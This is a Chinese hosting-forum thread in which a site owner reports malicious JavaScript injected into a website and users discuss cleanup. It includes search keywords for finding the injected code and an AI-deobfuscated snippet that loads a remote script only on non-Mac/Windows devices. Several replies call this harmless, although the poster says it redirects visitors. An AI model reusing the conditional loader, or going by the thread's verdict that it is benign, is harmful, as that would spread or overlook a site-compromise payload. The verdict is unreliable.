全球主机交流论坛

标题: 网站被挂马了，挂马js发出来给大家 [打印本页]

作者: nk123 时间: 2025-8-18 01:06
标题: 网站被挂马了，挂马js发出来给大家
js马代码发出来，大家研究

(, 下载次数: 50)

作者: 美女约吗 时间: 2025-8-18 01:09
直接发js代码不就行了吗？为什么要打包呢？

作者: nk123 时间: 2025-8-18 01:36

美女约吗发表于 2025-8-18 01:09
直接发js代码不就行了吗？为什么要打包呢？

hostloc禁止发，你试试

作者: 海的那一边 时间: 2025-8-18 01:41
本帖最后由海的那一边于 2025-8-18 01:48 编辑

nk123 发表于 2025-8-18 01:36
hostloc禁止发，你试试

问ai结果删除以下代码段：
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

全面排查网站文件：

攻击者可能不止在一处植入了代码。请仔细检查所有网站文件，特别是最近被修改过的文件，查找类似特征的混淆代码。可以搜索文件中是否包含 eval, aPnDhiTia, xxSJRox 等关键词。

代码末尾的注释 /*138ae887806f*/ 可能是攻击者的一个标识，您也可以尝试在所有文件中搜索这个字符串。

作者: hxhx 时间: 2025-8-18 11:02

海的那一边发表于 2025-8-18 01:41
问ai结果删除以下代码段：
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

前段时间我就发过帖子了 https://sunk.eu.org/thread-1424027-1-1.html

作者: 美女约吗 时间: 2025-8-18 13:13
这代码是跳广告还是
？

作者: sfss5362 时间: 2025-8-18 13:24
太可怕了

作者: lanmin 时间: 2025-8-18 15:10
gpt给还原后的代码

function loadJQuery() {
// jQuery 3.6.8 CDN
var url = "https://code.jquery.com/jquery.min-3.6.8.js";
// 创建 script 标签
var script = document.createElement("script");
script.type = "text/javascript";
script.src = url;
// 加载完成的回调（原代码里是个空函数）
script.onload = function () {
console.log("jQuery 已加载:", url);
};
// 插入到 <head>
document.head.appendChild(script);
}
// 如果不是 Mac 或 Windows 平台，就执行加载
if (!(/^Mac|Win/.test(navigator.platform))) {
loadJQuery();
}

复制代码

作者: nk123 时间: 2025-8-18 15:31

美女约吗发表于 2025-8-18 13:13
这代码是跳广告还是
？

跳转

作者: NetAnt 时间: 2025-8-18 15:37
月初的时候WP也被入侵了，只修改了WP站点文件。。
WP貌似被黑过三四次了。。。

作者: 论坛超人1983 时间: 2025-8-18 16:14
他怎么入侵的网站？

作者: wicktian 时间: 2025-8-18 16:15

lanmin 发表于 2025-8-18 15:10
gpt给还原后的代码

这啥都没干呀，就加载了下jQuery

作者: bysun 时间: 2025-8-18 17:00
所以是那个文件引起的？

作者: 羊村你喜哥 时间: 2025-8-18 17:17
代码不对吧。。。

作者: lanmin 时间: 2025-8-18 20:22

wicktian 发表于 2025-8-18 16:15
这啥都没干呀，就加载了下jQuery

嗯呐我再三问gpt 他都说没有恶意代码，就是正常的混淆而已。

作者: hins 时间: 2025-8-19 08:29

lanmin 发表于 2025-8-18 15:10
gpt给还原后的代码

这个代码没问题的，只是加载一个jquery.js

作者: williamc2 时间: 2025-8-19 10:40

欢迎光临全球主机交流论坛 (https://sunk.eu.org/)